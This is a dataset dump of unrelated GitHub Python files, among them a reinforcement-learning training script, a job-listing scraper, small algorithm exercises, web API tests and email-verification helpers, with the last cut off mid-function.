Ape\")\ncall2.display()\n\nq1 = CallCenter()\nq1.add(call1)\nq1.info()","repo_name":"sanjosejulia/Python","sub_path":"CallCenter.py","file_name":"CallCenter.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38528157541","text":"import sys\nimport os\nimport tensorflow as tf\n\nif 'COLAB_GPU' in os.environ:\n # fix module resolution so sibling packages can be imported\n from os.path import dirname\n 
sys.path.append(dirname(dirname(dirname(__file__))))\nelse: # local GPU\n gpus = tf.config.experimental.list_physical_devices('GPU')\n tf.config.experimental.set_virtual_device_configuration(\n gpus[0], [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=1 * 1024)]\n )\n \nimport Agents\nimport ConvDQNModel\nfrom CREDQEnsemble import CREDQEnsembleTrainable\n\nfrom ExperienceBuffers.CHGExperienceStorage import CHGExperienceStorage\nimport numpy as np\nfrom Utils.CNoisedNetwork import CNoisedNetwork\nimport time\nimport Utils\nimport math\nimport random\nfrom collections import defaultdict\n\ndef train(model, memory, params):\n T = time.time()\n lossSum = defaultdict(int) \n for _ in range(params['episodes']):\n batch, Err = memory.sampleReplays(1024)\n states, actions, rewards, nextStates, nextStateScoreMultiplier = batch[:5]\n \n states = Utils.restoreStates(states)\n nextStates = Utils.restoreStates(nextStates)\n actions = actions.astype(int) # plain int: np.int is deprecated and removed in newer NumPy\n \n ###############\n errors, loss = model.fit(states, actions, rewards, nextStates, nextStateScoreMultiplier)\n lossSum['loss'] += loss\n Err.update(errors)\n ###\n model.updateTargetModel(0.01)\n\n print('Training finished in %.1f sec.' % (time.time() - T))\n trainLoss = {k: v / params['episodes'] for k, v in lossSum.items()}\n print('Losses:')\n for k, v in trainLoss.items():\n print('Avg. %s: %.4f' % (k, v))\n print('')\n return\n\ndef forkAgent(model, epoch, params):\n LBM = model.clone()\n nm = 'LBM-%d' % epoch\n return (\n CNoisedNetwork(LBM, noise=.1+random.random() * 0.2),\n lambda world: Agents.CAgent(world, kind=nm)\n )\n\ndef learn_environment(model, params):\n NAME = params['name']\n metrics = {}\n wrHistory = {\n 'network': []\n }\n\n memory = CHGExperienceStorage(params['experience storage'])\n ######################################################\n lastBestModels = [forkAgent(model, 0, params)] * 3\n\n def testModel(EXPLORE_RATE, epoch):\n T = time.time()\n opponents = [\n (Utils.DummyNetwork, Agents.CGreedyAgent),\n (Utils.DummyNetwork, Agents.CGreedyAgent),\n (Utils.DummyNetwork, Agents.CGreedyAgent),\n ] if 0 == (epoch % 2) else lastBestModels\n\n res = Utils.collectExperience(\n [ # agents\n (CNoisedNetwork(model, EXPLORE_RATE), Agents.CAgent),\n *opponents\n ],\n memory,\n {\n 'episodes': params['test episodes'],\n 'env': params.get('env', {})\n }\n )\n print('Testing finished in %.1f sec.' % (time.time() - T))\n return res\n ######################################################\n # collect some experience\n for epoch in range(2):\n testModel(EXPLORE_RATE=0.8, epoch=0)\n\n #######################\n for epoch in range(params['epochs']):\n T = time.time()\n\n EXPLORE_RATE = params['explore rate'](epoch)\n print('[%s] %d/%d epoch. Explore rate: %.3f.' 
% (NAME, epoch, params['epochs'], EXPLORE_RATE))\n ##################\n # Training\n# if params.get('target update', lambda _: True)(epoch):\n# model.updateTargetModel()\n \n train(model, memory, { 'episodes': params['train episodes'](epoch) })\n\n ##################\n os.makedirs('weights', exist_ok=True)\n model.save('weights/%s-latest.h5' % NAME)\n # test\n if (epoch % params['test interval']) == 0:\n print('Testing...')\n stats, winRates = testModel(EXPLORE_RATE, epoch)\n for k, v in stats.items():\n Utils.trackScores(v, metrics, metricName=k)\n \n for k, v in winRates.items():\n if k not in wrHistory:\n wrHistory[k] = [0] * epoch\n wrHistory[k].append(v)\n ##################\n \n print('Scores sum: %.5f' % sum(stats['Score_network']))\n \n if (0 < (epoch % 2)) and (params['min win rate'] <= winRates['network']):\n print('save model (win rate: %.2f%%)' % (100.0 * winRates['network']))\n model.save('weights/%s-epoch-%06d.h5' % (NAME, epoch))\n ########\n lastBestModels.insert(0, forkAgent(model, epoch, params))\n modelsHistory = params.get('models history', 3)\n lastBestModels = lastBestModels[:modelsHistory]\n \n os.makedirs('charts/%s' % NAME, exist_ok=True)\n for metricName in metrics.keys():\n Utils.plotData2file(metrics, 'charts/%s/%s.jpg' % (NAME, metricName), metricName)\n Utils.plotSeries2file(wrHistory, 'charts/%s/win_rates.jpg' % (NAME,), 'Win rates')\n ##################\n print('Epoch %d finished in %.1f sec.' % (epoch, time.time() - T))\n print('------------------')\n return\n############\n\nnetwork = CREDQEnsembleTrainable(\n submodel=ConvDQNModel.createModel,\n NModels=3, M=2\n)\nnetwork.summary()\n\n# calc GAMMA so +-1 reward after N steps would give +-0.001 for current step\nGAMMA = math.pow(0.001, 1.0 / 50.0)\nprint('Gamma: %.5f' % GAMMA)\n\nENVIRONMENT_SETTINGS ={\n 'episode steps': 200,\n 'min players': 2,\n ##############\n 'survived reward': +5,\n 'kill reward': +0,\n 'grow reward': lambda x: 0.1,\n 'starve reward': -10,\n 'death reward': -0,\n 'opponent death reward': +0,\n 'killed reward': -0,\n 'rank reward': {\n 1: 11,\n 2: 5,\n 3: -5,\n 4: -10\n }\n}\n\nDEFAULT_LEARNING_PARAMS = {\n 'experience storage': {\n 'batch size': 256,\n 'gamma': GAMMA,\n 'bootstrapped steps': 1,\n 'fetch replays': {\n 'replays': 256 * 1,\n 'batch interval': 2000,\n },\n \n 'replays': {\n 'disabled': True,\n 'folder': os.path.join(os.path.dirname(__file__), 'replays'),\n 'replays per chunk': 1000,\n 'env': ENVIRONMENT_SETTINGS,\n },\n \n 'low level policy': {\n },\n \n 'high level policy': {\n 'steps': 5,\n 'samples': 25,\n },\n },\n\n 'epochs': 10000,\n 'train episodes': lambda _: 16,\n 'test interval': 1,\n 'test episodes': 1,\n\n 'explore rate': lambda e: 0.0,\n \n 'env': ENVIRONMENT_SETTINGS,\n 'min win rate': 0.55,\n}\n#######################\nfor i in range(1):\n learn_environment(\n network,\n {\n **DEFAULT_LEARNING_PARAMS,\n 'name': 'agent-%d' % i\n }\n )","repo_name":"GreenWizard2015/Hungry-Geese","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5447271916","text":"# honestly found it on the internet:\n\n# import math\n# n = int(input(\"Enter a number to calculate its factorial\"))\n# print(math.factorial(n))\n\n\nnum = int(input(\"Enter a number to calculate its factorial\"))\n\nfactorial = 1\nwhile num > 1:\n factorial *= num\n num -= 1\n \nprint(\"The factorial\", 
factorial)\n","repo_name":"kolyasalubov/UA-12-10-23.PythonFundamentals","sub_path":"DMan/HW5/5.3.py","file_name":"5.3.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"39560442350","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nURL = 'https://www.fl.ru/projects/'\nHEADERS = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0', 'accept': '*/*'}\nHOST = 'https://www.fl.ru'\nFILE = 'offers.csv'\n\ndef get_html(url, params=None):\n r = requests.get(url, headers=HEADERS, params=params)\n return r\n\ndef get_pages_count(html):\n soup = BeautifulSoup(html, 'html.parser')\n pagination = soup.findAll('li', class_='b-pager__item')\n if pagination:\n return int(pagination[-1].get_text())\n else:\n return 1\n\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.findAll('h2', class_='b-post__title')\n\n offers = []\n for item in items:\n offers.append({\n 'title': item.find('a', class_='b-post__link').get_text(strip=True),\n 'link': HOST + item.find('a', class_='b-post__link').get('href')\n })\n return offers\n\ndef save_file(items, path):\n with open(path, 'w', newline='') as file:\n writer = csv.writer(file, delimiter=';')\n writer.writerow(['Title', 'Link'])\n for item in items:\n writer.writerow([item['title'], item['link']])\n\n\ndef parse():\n html = get_html(URL)\n if html.status_code == 200:\n offers = []\n pages_count = get_pages_count(html.text)\n for page in range(1, 20):\n print(f'Trying to find something worthwhile! Page {page} of 19...')\n html = get_html(URL, params={'page': page})\n offers.extend(get_content(html.text))\n save_file(offers, FILE)\n print(f'Parsed {len(offers)} offers')\n else:\n print("Error")\n\nparse()","repo_name":"mfkrg/PY-FL-Parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24077994022","text":"# Program for n’th node from the end of a Linked List\n# Given a Linked List and a number n, write a function that returns the value at the n’th node from end of the Linked List.\n\n# For example, if the input is the list below and n = 3, then the output is “B”\n# A->B->C->D->\n\nclass node(object):\n\tdef __init__(self,x):\n\t\tself.data = x\n\t\tself.next = None\n\nclass LinkedList(object):\n\tdef __init__(self):\n\t\tself.head = None\n\t\tself.currNode = None\n\tdef push(self,x):\n\t\ttemp = node(x)\n\t\tif self.head is None:\n\t\t\tself.head = temp\n\t\t\tself.currNode = self.head\n\t\telse:\n\t\t\tself.currNode.next = temp\n\t\t\tself.currNode = temp\n\tdef printNthNodeFromEnd(self,count):\n\t\ttemp1 = self.head\n\t\ttemp2 = self.head\n\t\twhile(count > 0):\n\t\t\ttemp1 = temp1.next\n\t\t\tcount -=1\n\t\twhile(temp1 is not None):\n\t\t\ttemp1 = temp1.next\n\t\t\ttemp2 = temp2.next\n\t\tprint(temp2.data)\nl = LinkedList()\n\nl.push('A')\nl.push('B')\nl.push('C')\nl.push('D')\n\nl.printNthNodeFromEnd(3)","repo_name":"zack4114/Amazon-Questions","sub_path":"PrintNthNodeFromEndOfLinkedList.py","file_name":"PrintNthNodeFromEndOfLinkedList.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29630194291","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom PA_Exercise_02 import Exercise_1\nfrom PA_Exercise_02 
import Exercise_2\nfrom PA_Exercise_02 import CrossValidation as CV\n\nSHOW_ASSIGNMENT = False\nSHOW_OBSERVE_1 = False\nSHOW_OBSERVE_2 = False\nSHOW_CV = True\n\nif __name__==\"__main__\":\n ex1 = Exercise_1(3)\n ex2 = Exercise_2()\n\n samples = [10000,50000,100000,200000,400000] \n weights = [9,40,60]\n\n if SHOW_ASSIGNMENT:\n img_1 = ex1.get_img()\n img_2 = ex1.do_sampling(100000)\n img_3 = ex2.do_sampling(img_2,9)\n \n plt.figure(\"Group 20: Exercise 02 result\", figsize=(10,3))\n plt.subplot(131)\n plt.imshow(img_1,cmap=\"gray\")\n plt.title(\"Gaussian filter with \\\\sigema = {}\".format(3))\n plt.subplot(132)\n plt.imshow(img_2)\n plt.title(\"New img with sample = {}\".format(100000)) \n plt.subplot(133)\n plt.imshow(img_3)\n plt.title(\"New img with kernel = {}\".format(9))\n plt.suptitle(\"Group 20: Exercise 02 result\")\n\n if SHOW_OBSERVE_1:\n idx = 1\n plt.figure(\"Observe from exercise 1\")\n sampleNum = len(samples)\n for sample in samples:\n img = ex1.do_sampling(sample) \n plt.subplot(1,sampleNum,idx)\n plt.imshow(img)\n plt.title(\"New img with sample = {}\".format(sample)) \n idx += 1\n plt.suptitle(\"Observe from exercise 1\") \n \n if SHOW_OBSERVE_2:\n idx = 1\n plt.figure(\"Observe from exercise 2\")\n weightNum = len(weights)+1\n imgInput = ex1.do_sampling(100000)\n plt.subplot(1,weightNum,idx)\n plt.imshow(imgInput)\n plt.title(\"Input img with sample = {}\".format(100000)) \n \n for weight in weights:\n idx += 1\n img = ex2.do_sampling(imgInput, weight) \n plt.subplot(1,weightNum,idx)\n plt.imshow(img)\n plt.title(\"New img with K-weight = {}\".format(weight)) \n plt.suptitle(\"Observe from exercise 2\") \n \n if SHOW_CV:\n sampleSize = [100000]\n k = 10\n\n candidateMin = 7\n candidateMax = 15 \n candidate = np.linspace(candidateMin, candidateMax, candidateMax-candidateMin+1)\n\n gtd = ex1.get_img()\n cv = CV(k, candidate, gtd, (ex1,ex2))\n \n for sample in sampleSize: \n res = cv.train(ex1.get_idx(sample))\n cv.plotResult(res,sample)\n\n plt.show()\n\n","repo_name":"skye789/PA","sub_path":"B_ Exercise Worksheets a Material/code_hu/EX1/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40392198424","text":"\"\"\"\nA basic example that connects two packet generators to a network wire with\na propagation delay distribution, and then to a packet sink.\n\"\"\"\n\nfrom onl.packet import DistPacketGenerator, PacketSink\nfrom onl.scheduler import SP\nfrom onl.sim import Environment\n\n\ndef arrival_1():\n \"\"\"Packets arrive with a constant interval of 1.5 seconds.\"\"\"\n return 1.5\n\n\ndef arrival_2():\n \"\"\"Packets arrive with a constant interval of 2.0 seconds.\"\"\"\n return 2.0\n\n\ndef packet_size():\n return 100\n\n\nenv = Environment()\nsp1 = SP(env, 100, {0: 1, 1: 10}, debug=True)\nsp2 = SP(env, 100, {0: 50, 1: 100}, debug=True)\nps = PacketSink(env, rec_flow_ids=False, debug=True)\n\npg1 = DistPacketGenerator(env, \"flow_1\", arrival_1, packet_size, flow_id=0)\npg2 = DistPacketGenerator(env, \"flow_2\", arrival_2, packet_size, flow_id=1)\n\npg1.out = sp1\npg2.out = sp1\nsp1.out = sp2\nsp2.out = ps\n\nenv.run(until=20)\n","repo_name":"OpenNetLab/OpenNetLab-Edu","sub_path":"tests/apps/sp.py","file_name":"sp.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69818207092","text":"from threading import Thread, Condition, Lock\nfrom . 
import TupleSpaceBucket\nfrom contextlib import contextmanager\nfrom collections import defaultdict\n\n\nclass TupleSpaceParallelBuckets(TupleSpaceBucket):\n\n def __init__(self):\n super().__init__()\n\n #List of the mutation locks for the buckets\n self.mutation_locks_list = defaultdict(list)\n self.mutation_lock_update = Condition()\n\n #List of the number of readers duing queries in each bucket\n self.readers_list = defaultdict(list)\n self.reader_lock_update = Condition()\n\n #List of the locks for the number of readers in each bucket\n self.readers_locks_list = defaultdict(list)\n self.readers_lock_list_update = Condition()\n\n #List of the query locks for each bucket\n self.query_locks_list = defaultdict(list)\n self.query_lock_update = Condition()\n\n\n def hash(self,sequence):\n #Hash function - similar to the one used for the buckets\n return tuple(x if isinstance(x, type) else type(x) for x in sequence)\n\n\n def put(self, *tuple):\n \"\"\"Place tuple in tuple space\n\n Notifies all locks of new tuple.\n \"\"\"\n with self.mutation_lock(tuple,notify=True), self.query_lock(tuple,notify=True):\n # run tuple insertion logic while lock is held\n self._add(tuple)\n\n\n def get(self, *pattern, blocking=True):\n \"\"\"Fetch, remove and return tuple from repository\n\n If blocking, wait until match. Otherwise, return None.\n \"\"\"\n while True:\n with self.mutation_lock(pattern):\n try:\n tuple = self._find(pattern)\n self._remove(tuple)\n return tuple\n except:\n if blocking:\n self.wait_mutation_lock(pattern)\n else:\n return None\n\n\n def query(self, *pattern, blocking=True):\n \"\"\"Find and return tuple, blocks until tuple is available\n\n Same as atomic version of\n > tuple = get(*pattern)\n > put(tuple)\n > return tuple\n \"\"\"\n while True:\n #If first reader, get lock\n with self.readers_lock(pattern):\n r = self.addReader(pattern)\n if r == 1:\n self.get_mutation_lock(pattern)\n try:\n wait = False # must be reset to False on each iteration\n return self._find(pattern)\n except:\n if not blocking:\n return None\n else:\n wait = True # ensure block after query update\n finally:\n #If last reader, release lock\n with self.query_lock(pattern):\n with self.readers_lock(pattern):\n r = self.removeReader(pattern)\n if r == 0:\n self.release_mutation_lock(pattern)\n if wait:\n self.wait_query_lock(pattern)\n\n\n #Genereal methods for a lock\n def get_lock(self,pattern,list_of_locks,update_lock):\n index = self.hash(pattern)\n with update_lock:\n # creates a new lock, if it does not exist for the given index\n if not list_of_locks[index]:\n list_of_locks[index].append(Condition(lock=Lock()))\n list_of_locks[index][0].acquire()\n\n def release_lock(self,pattern,list_of_locks,notify=False):\n index = self.hash(pattern)\n if notify:\n list_of_locks[index][0].notify_all()\n list_of_locks[index][0].release()\n\n def wait_lock(self,pattern,list_of_locks):\n list_of_locks[self.hash(pattern)][0].wait()\n\n\n #Methods for managing the mutation locks\n @contextmanager\n def mutation_lock(self,pattern,notify=False):\n self.get_lock(pattern, self.mutation_locks_list, self.mutation_lock_update)\n try:\n yield\n finally:\n self.release_lock(pattern, self.mutation_locks_list,notify=notify)\n\n def get_mutation_lock(self,pattern):\n self.get_lock(pattern,self.mutation_locks_list,self.mutation_lock_update)\n\n def release_mutation_lock(self,pattern,notify=False):\n self.release_lock(pattern,self.mutation_locks_list,notify=notify)\n\n def wait_mutation_lock(self,pattern):\n 
self.wait_lock(pattern,self.mutation_locks_list)\n\n\n #Methods for managing the query locks\n @contextmanager\n def query_lock(self,pattern,notify=False):\n self.get_lock(pattern, self.query_locks_list, self.query_lock_update)\n try:\n yield\n finally:\n self.release_lock(pattern, self.query_locks_list,notify=notify)\n\n def wait_query_lock(self,pattern):\n self.wait_lock(pattern,self.query_locks_list)\n\n #Methods for updating the number of readers in each bucket\n @contextmanager\n def readers_lock(self,pattern):\n self.get_lock(pattern,self.readers_locks_list,self.readers_lock_list_update)\n try:\n yield\n finally:\n self.release_lock(pattern, self.readers_locks_list)\n\n def addReader(self,pattern):\n index = self.hash(pattern)\n with self.reader_lock_update:\n if not self.readers_list[index]:\n self.readers_list[index].append(0)\n self.readers_list[index][0] += 1\n return self.readers_list[index][0]\n\n def removeReader(self,pattern):\n index = self.hash(pattern)\n self.readers_list[index][0] -= 1\n return self.readers_list[index][0]\n","repo_name":"zachasme/school-pyresp","sub_path":"pyresp/tuplespace/parallel_buckets.py","file_name":"parallel_buckets.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"6309551417","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nclass debugInp():\n def __init__(self):\n self.ebeam = 76.56296774\n self.pbeam = 4.88\n self.rtang = 1.715\n self.BT0 = 2.0\n self.nbeams_loc='/home/jonathan/Dropbox/GTEDGE/MyPrograms/GTEDGE/lib/beams/NBeamsMDS/NBeams/bin/Release/nbeams'\n","repo_name":"gt-frc/gt3","sub_path":"GT3/BeamDeposition/Test/DebugInp.py","file_name":"DebugInp.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"35401530109","text":"import uuid\n\nimport nose\nimport requests\n\nimport hermes\nfrom . 
import _utils as tu\n\n\n\n# Web service endpoints.\n_EP_BASE = r\"http://localhost:8888/api/1/simulation/metrics/{}\"\n_EP_ADD = _EP_BASE.format(\"add\")\n_EP_DELETE = _EP_BASE.format(\"delete?group={0}\")\n_EP_FETCH = _EP_BASE.format(\"fetch?group={0}\")\n_EP_FETCH_COLUMNS = _EP_BASE.format(\"fetch_columns?group={0}\")\n_EP_FETCH_COUNT = _EP_BASE.format(\"fetch_count?group={0}\")\n_EP_FETCH_LIST = _EP_BASE.format(\"fetch_list\")\n_EP_FETCH_SETUP = _EP_BASE.format(\"fetch_setup?group={0}\")\n_EP_RENAME = _EP_BASE.format(\"rename?group={0}&new_name={1}\")\n\n# Existing metric groups.\n_GROUPS = set()\n\n# Group name length constraints.\n_GROUP_NAME_MIN_LENGTH = 4\n_GROUP_NAME_MAX_LENGTH = 256\n\n\n\ndef _on_test_setup():\n\t\"\"\"Test setup.\n\n\t\"\"\"\n\tr = tu.invoke_api(requests.get, _EP_FETCH_LIST)\n\tr = r.json()\n\t_GROUPS.update(r['groups'])\n\n\ndef _on_test_teardown():\n\t\"\"\"Test teardown.\n\n\t\"\"\"\n\tr = tu.invoke_api(requests.get, _EP_FETCH_LIST)\n\tr = r.json()\n\tfor group in [g for g in r['groups'] if g not in _GROUPS]:\n\t\ttu.invoke_api(requests.post, _EP_DELETE.format(group))\n\n\ndef _get_metrics():\n\t\"\"\"Returns a set of valid metrics.\n\n\t\"\"\"\n\treturn {\n\t\tu'columns': [\n\t\t\tu'a', u'b', u'c', u'd', u'e', u'f', '_id'\n\t\t],\n\t\tu'group': tu.get_string(12),\n\t\tu'metrics': [\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t]\n\t}\n\n\ndef _yield_invalid_metrics():\n\t\"\"\"Yield invalid metrics for testing purposes.\n\n\t\"\"\"\n\tdef _get_invalid_metrics_01():\n\t\t\"\"\"Returns a set of metrics with an invalid group name.\"\"\"\n\t\tdata = _get_metrics()\n\t\tdata['group'] = u'test-#$%'\n\n\t\treturn data\n\n\n\tdef _get_invalid_metrics_02():\n\t\t\"\"\"Returns a set of metrics with an invalid group name.\"\"\"\n\t\tdata = _get_metrics()\n\t\tdata['group'] = u\"\"\n\t\tfor i in range(_GROUP_NAME_MIN_LENGTH - 1):\n\t\t\tdata['group'] += u\"A\"\n\n\t\treturn data\n\n\n\tdef _get_invalid_metrics_03():\n\t\t\"\"\"Returns a set of metrics with an invalid group name.\"\"\"\n\t\tdata = _get_metrics()\n\t\tdata['group'] = u\"\"\n\t\tfor i in range(_GROUP_NAME_MAX_LENGTH + 1):\n\t\t\tdata['group'] += u\"A\"\n\n\t\treturn data\n\n\n\tdef _get_invalid_metrics_04():\n\t\t\"\"\"Returns a set of metrics with a column mismatch.\"\"\"\n\t\tdata = _get_metrics()\n\t\tdata['metrics'] = [\n\t\t\t[1, 2, 3, 4, 5],\n\t\t\t[1, 2, 3, 4, 5, 6],\n\t\t]\n\n\t\treturn data\n\n\n\tdef _get_invalid_metrics_05():\n\t\t\"\"\"Returns a set of metrics with an invalid column name.\"\"\"\n\t\tdata = _get_metrics()\n\t\tdata['columns'] = data['columns'][:5] + [\"metric_id\"]\n\n\t\treturn data\n\n\t# Yield factory functions.\n\tyield _get_invalid_metrics_01\n\tyield _get_invalid_metrics_02\n\tyield _get_invalid_metrics_03\n\tyield _get_invalid_metrics_04\n\tyield _get_invalid_metrics_05\n\n\ndef _assert_fetch_count(r, m):\n\t\"\"\"Asserts web service endpoint response: fetch-count.\n\n\t\"\"\"\n\tresponse = tu.assert_api_response(r)\n\ttu.assert_string(m['group'], response['group'])\n\ttu.assert_integer(len(m['metrics']), int(response['count']))\n\n\ndef _assert_fetch_columns(r, m):\n\t\"\"\"Asserts web service endpoint response: fetch-columns.\n\n\t\"\"\"\n\texpected = m.copy()\n\tdel 
expected['metrics']\n\n\ttu.assert_api_response(r, expected_data=expected)\n\n\ndef _assert_fetch_list(r, old_list=None, diff=1):\n\t"""Asserts web service endpoint response: fetch-list.\n\n\t"""\n\tresponse = tu.assert_api_response(r)\n\tif old_list:\n\t\tnew_list = response['groups']\n\t\tfor item in old_list:\n\t\t\tassert item in new_list\n\t\tif diff:\n\t\t\ttu.assert_integer(len(new_list), len(old_list) + diff)\n\n\ndef _assert_fetch_setup(r, m):\n\t"""Asserts web service endpoint response: fetch-setup.\n\n\t"""\n\texpected = m.copy()\n\tdel expected['metrics']\n\texpected['data'] = [set() for _ in m['columns']]\n\tfor row in m['metrics']:\n\t\tfor i in range(0, len(m['columns']) - 1):\n\t\t\texpected['data'][i].add(row[i])\n\texpected['data'] = [list(i) for i in expected['data']]\n\tresponse = tu.assert_api_response(r)\n\n\ndef _test_positive():\n\t"""testing sim-metrics web service: positive\n\n\t"""\n\t# Fetch list.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_LIST)\n\t_assert_fetch_list(r)\n\tm_list = r.json()['groups']\n\n\t# Add.\n\tm = _get_metrics()\n\tr = tu.invoke_api(requests.post, _EP_ADD, m)\n\ttu.assert_api_response(r)\n\n\t# Fetch.\n\tr = tu.invoke_api(requests.get, _EP_FETCH.format(m['group']))\n\ttu.assert_api_response(r, expected_data=m)\n\tm_fetched = r.json()\n\n\t# Fetch columns.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_COLUMNS.format(m['group']))\n\t_assert_fetch_columns(r, m)\n\n\t# Fetch count.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_COUNT.format(m['group']))\n\t_assert_fetch_count(r, m)\n\n\t# Fetch list.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_LIST)\n\t_assert_fetch_list(r, old_list=m_list, diff=1)\n\n\t# Fetch setup.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_SETUP.format(m['group']))\n\t_assert_fetch_setup(r, m)\n\n\t# Rename.\n\tnew_name = tu.get_string(12)\n\tr = tu.invoke_api(requests.post, _EP_RENAME.format(m['group'], new_name))\n\ttu.assert_api_response(r)\n\n\t# Delete.\n\tr = tu.invoke_api(requests.post, _EP_DELETE.format(new_name))\n\ttu.assert_api_response(r)\n\n\t# Fetch list.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_LIST)\n\t_assert_fetch_list(r, old_list=m_list, diff=0)\n\n\t# Fetch.\n\tr = tu.invoke_api(requests.get, _EP_FETCH.format(new_name))\n\ttu.assert_integer(r.status_code, 400)\n\n\ndef _test_negative():\n\t"""testing sim-metrics web service: negative\n\n\t"""\n\tfor m in (f() for f in _yield_invalid_metrics()):\n\t\tr = tu.invoke_api(requests.post, _EP_ADD, m)\n\t\ttu.assert_integer(r.status_code, 400)\n\n\n@nose.tools.with_setup(setup=_on_test_setup, teardown=_on_test_teardown)\ndef test():\n\t"""Tests sim-metrics web service.\n\n\t"""\n\tfor test in (\n\t\t_test_positive,\n\t\t_test_negative\n\t\t):\n\t\ttest.description = test.__doc__.strip()\n\t\tyield test\n","repo_name":"ESPRI-Mod/hermes-server","sub_path":"tests/test_web_sim_metrics.py","file_name":"test_web_sim_metrics.py","file_ext":"py","file_size_in_byte":5807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73727630132","text":"t = int(input())\r\nfor i in range(1, t+1):\r\n    ab_len = list(map(int, input().split()))\r\n    answer = 0\r\n    a = list(map(int, input().split()))\r\n    b = list(map(int, input().split()))\r\n\r\n    if len(a) > len(b):\r\n        max = a\r\n        min = b\r\n    else:\r\n        max = b\r\n        min = a\r\n\r\n    sum_list = []\r\n    print(len(max)-len(min)+1)\r\n    print(f'max is {max}')\r\n    print(f'min is {min}')\r\n    for j in range(0, len(max)-len(min)+1):\r\n        sum = 0\r\n        for k in 
range(j, len(min)+j):\r\n sum += max[k] * min[k-j]\r\n sum_list.append(sum)\r\n print(sum_list)\r\n answer = sum_list[0]\r\n for val in sum_list:\r\n if val > answer:\r\n answer = val\r\n\r\n print('#{} {}'.format(i, answer))","repo_name":"eprj453/algorithm","sub_path":"PYTHON/SWEXPERTACADEMY/D2/1959.py","file_name":"1959.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6899280114","text":"import datetime\nimport json\nfrom enum import Enum, auto\nfrom uuid import uuid4\n\nfrom common import app_settings\nfrom common.app_settings import domain\nfrom common.email_messages import (\n emailChangeNotificationEmail,\n emailChangeVerificationEmail,\n emailChangeDuplicateNotificationEmail,\n emailVerificationNeededEmail,\n parentsEmailVerificationNeededEmail,\n)\nfrom common.models import EmailVerification, Teacher, Student\nfrom django.contrib.auth.models import User\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom django.utils import timezone\nfrom requests import post, get, put, delete\nfrom requests.exceptions import RequestException\n\nNOTIFICATION_EMAIL = \"Code For Life Notification <\" + app_settings.EMAIL_ADDRESS + \">\"\nVERIFICATION_EMAIL = \"Code For Life Verification <\" + app_settings.EMAIL_ADDRESS + \">\"\nPASSWORD_RESET_EMAIL = \"Code For Life Password Reset <\" + app_settings.EMAIL_ADDRESS + \">\"\nINVITE_FROM = \"Code For Life Invitation <\" + app_settings.EMAIL_ADDRESS + \">\"\n\n\nclass DotmailerUserType(Enum):\n TEACHER = auto()\n STUDENT = auto()\n NO_ACCOUNT = auto()\n\n\ndef send_email(\n sender,\n recipients,\n subject,\n text_content,\n title,\n html_content=None,\n plaintext_template=\"email.txt\",\n html_template=\"email.html\",\n):\n\n # add in template for templates to message\n\n # setup templates\n plaintext = loader.get_template(plaintext_template)\n html = loader.get_template(html_template)\n plaintext_email_context = {\"content\": text_content}\n html_email_context = {\"content\": text_content, \"title\": title, \"url_prefix\": domain()}\n\n # render templates\n plaintext_body = plaintext.render(plaintext_email_context)\n html_body = html.render(html_email_context)\n\n # make message using templates\n message = EmailMultiAlternatives(subject, plaintext_body, sender, recipients)\n message.attach_alternative(html_body, \"text/html\")\n\n message.send()\n\n\ndef generate_token(user, email=\"\", preverified=False):\n return EmailVerification.objects.create(\n user=user,\n email=email,\n token=uuid4().hex[:30],\n expiry=timezone.now() + datetime.timedelta(hours=1),\n verified=preverified,\n )\n\n\ndef send_verification_email(request, user, new_email=None, age=None):\n \"\"\"Send an email prompting the user to verify their email address.\"\"\"\n\n if not new_email: # verifying first email address\n user.email_verifications.all().delete()\n\n verification = 